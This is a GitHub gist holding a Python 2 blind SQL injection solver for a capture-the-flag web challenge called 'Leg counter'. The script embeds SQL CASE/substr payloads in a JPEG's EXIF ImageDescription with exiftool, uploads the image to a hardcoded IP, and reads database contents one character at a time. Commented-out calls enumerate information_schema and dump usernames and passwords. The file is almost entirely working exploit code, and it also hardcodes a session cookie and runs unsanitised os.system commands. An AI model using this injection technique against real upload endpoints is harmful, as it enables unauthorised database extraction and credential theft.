@abdilahrf
Last active October 3, 2019 10:25
Leg counter web challenges solver (Blind SQLi Template)
import requests
import re
from StringIO import StringIO
from pycurl import *
import os
import pickle
# Module-level configuration; the functions below read these names directly
# rather than taking them as parameters.
url = "http://103.56.207.107:50001/upload.php"

# Form fields as the challenge page names them. Nothing below reads this dict:
# upload() builds its own multipart field list (with a lowercase "submit").
payload = dict(Submit="Deteksi", token="")

# Proxies handed to requests in getToken() only. upload() pins its own pycurl
# PROXY separately, so the two request paths are not guaranteed to agree.
http_proxy = "http://127.0.0.1:8080"
https_proxy = "https://10.10.1.11:1080"
ftp_proxy = "ftp://10.10.1.10:3128"
proxyDict = dict(http=http_proxy, https=https_proxy, ftp=ftp_proxy)

# Browser-like headers for the GET in getToken(). "Content-Type" carries no
# multipart boundary; that is harmless on a GET but would break a real
# multipart POST, which is why upload() lets pycurl set its own.
headers = {
    "Cache-Control": "max-age=0",
    "Origin": "http://103.56.207.107:50001",
    "Upgrade-Insecure-Requests": "1",
    "Content-Type": "multipart/form-data",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
    "Referer": "http://103.56.207.107:50001/",
    "Accept-Language": "en-US,en;q=0.9,de;q=0.8,es;q=0.7,id;q=0.6,ms;q=0.5",
    "Connection": "close",
    "Cookie": "PHPSESSID=5d42tgrbtj0lifr04f02k3r1e6",
}

# The session id is a credential and it is committed to a public gist; it is
# also duplicated in the "Cookie" header above, so the two copies can drift
# apart when one is edited. Nothing below reads this dict (getToken() sends
# the header copy, upload() uses cookie.txt).
cookies = dict(PHPSESSID="5d42tgrbtj0lifr04f02k3r1e6")
def check(data):
    """Yes/no oracle over a response body.

    Args:
        data: response text to inspect.

    Returns:
        The re match object when the marker "Satu kaki" occurs anywhere in
        ``data`` (truthy), otherwise None.
    """
    marker = re.compile("Satu kaki")
    return marker.search(data)
def getToken():
    """Fetch the front page and return the value of its first hidden input.

    Reads the module-level ``headers`` and ``proxyDict``. The capture group
    is greedy, so it can run past the first closing quote; splitting on '"'
    and keeping the first piece trims it back to the attribute value.

    Returns:
        The hidden-input value as a stripped str.

    Raises:
        AttributeError: when no ``type="hidden" value="..."`` input is found
            (re.search returns None and ``.group`` is called on it).
    """
    sess = requests.session()
    page = sess.get("http://103.56.207.107:50001/", headers=headers, proxies=proxyDict)
    match = re.search(r"type=\"hidden\" value=\"(.*)\"", page.text)
    captured = match.group(1)
    first_value = captured.split("\"")[0]
    return str(first_value).strip()
def upload(token):
    """POST ``1leg.jpg`` from the working directory to ``url`` and return the body.

    The request is sent with pycurl through a proxy fixed at 127.0.0.1:8080
    (independent of ``proxyDict``), follows redirects, and persists cookies in
    ``cookie.txt`` in the working directory. Response headers are captured but
    discarded. The form field is named "submit" (lowercase), unlike the unused
    ``payload`` dict's "Submit".

    Args:
        token: hidden-input value from getToken(); sent as the "token" field.

    Returns:
        The accumulated response body.
    """
    body = StringIO()
    resp_headers = StringIO()
    form = [
        ('legpic', (FORM_FILE, '1leg.jpg')),
        ('submit', 'Deteksi'),
        ('token', str(token)),
    ]
    # Options are applied in the same order the original set them.
    options = [
        (URL, url),
        (POST, 1),
        (HTTPPOST, form),
        (COOKIEFILE, 'cookie.txt'),
        (COOKIEJAR, 'cookie.txt'),
        (FOLLOWLOCATION, 1),
        (PROXY, '127.0.0.1:8080'),
        (WRITEFUNCTION, body.write),
        (HEADERFUNCTION, resp_headers.write),
    ]
    curl = Curl()
    for opt, value in options:
        curl.setopt(opt, value)
    curl.perform()
    curl.close()
    return body.getvalue()
def blind(kolom,table):
    # Reads `kolom` from `table` one character at a time, using check() on the
    # upload response as a yes/no oracle. For each position idx the inner loop
    # binary-searches byte values 1..255; every probe re-tags 1leg.jpg with
    # exiftool and re-uploads it, so one character costs up to eight uploads.
    # From the server side that is a burst of near-identical image uploads per
    # character, each carrying a SQL CASE expression in ImageDescription.
    #
    # NOTE(review): the gist is published without indentation. The nesting
    # below is reconstructed so that the `hi == 0` test ends the OUTER loop,
    # which is the only way `return passwd` is reachable — confirm against the
    # author's copy.
    #
    # Python 2 is assumed (`print` statement, StringIO module): `/` on ints
    # floors, so mid stays an integer. Under Python 3 mid would be a float and
    # the char() argument in the query would no longer be an integer.
    passwd = ""
    idx = 1
    while (True):
        lo = 1
        hi = 255
        # Stays -1 if no probe answers "yes"; chr(-1) below then raises ValueError.
        temp = -1
        while(lo <= hi):
            mid = (lo + hi) / 2
            # command = "exiftool -ImageDescription=\"leg=(SELECT CASE when hex(substr({},{},1)) <= hex(char({})) THEN 1 ELSE 2 END FROM {})\" 1leg.jpg".format(str(kolom),str(idx),str(mid),str(table))
            # kolom and table are interpolated unquoted into a shell command and
            # run via os.system: any shell metacharacter in either argument is
            # executed on the operator's own machine.
            command = "exiftool -ImageDescription=\"leg=(SELECT CASE when hex(substr({},{},1)) <= hex(char({})) THEN 1 ELSE 2 END FROM {})\" 1leg.jpg".format(str(kolom),str(idx),str(mid),str(table))
            os.system(command)
            # A fresh token is fetched for every single probe (one extra GET each).
            res = upload(getToken())
            #print command
            #print res
            if check(res):
                # "yes": the byte is <= mid, so keep searching the lower half.
                hi = mid-1
                temp = mid
            else:
                lo = mid+1
        # hi can only reach 0 when every probe answered "yes" and the search
        # converged on byte 1; presumably the end of the value — stop reading.
        if (hi == 0): break
        passwd += chr(temp)
        print "Result [{}]: {}".format(table,passwd)
        idx += 1
    return passwd
# Module-level entry point: runs on import as well as when executed directly
# (there is no __main__ guard). The commented-out lines below are alternate
# invocations the author left in.
blind("flaag","mysecretflaag")
# blind("name","sqlite_master")
# blind("sql","sqlite_master where sql like(char(37,102,108,97,103,37))")
# PRAGMA table_info(sqlite_master);
#CREATE TABLE Legs (Id INTEGER PRIMARY KEY, Session TEXT UNIQUE, Leg INTEGER)
# get table name
# blind("group_concat(table_name)", "information_schema.tables where table_schema!=0x696e666f726d6174696f6e5f736368656d61")
# blind("group_concat(table_name)", "information_schema.tables order by table_schema desc")
# Result: users
#
# get column name
# username,password
# blind("group_concat(column_name)", "information_schema.columns where table_name='users'")
# blind("group_concat(column_name)", "information_schema.columns where table_name='Login'")
# blind("group_concat(column_name)", "information_schema.columns where table_name='Flag'")
# get data
# blind("group_concat(username,0x3a,password)", "users")
# blind("group_concat(username,password)", "Login")
# blind("group_concat(username,password)", "Flag")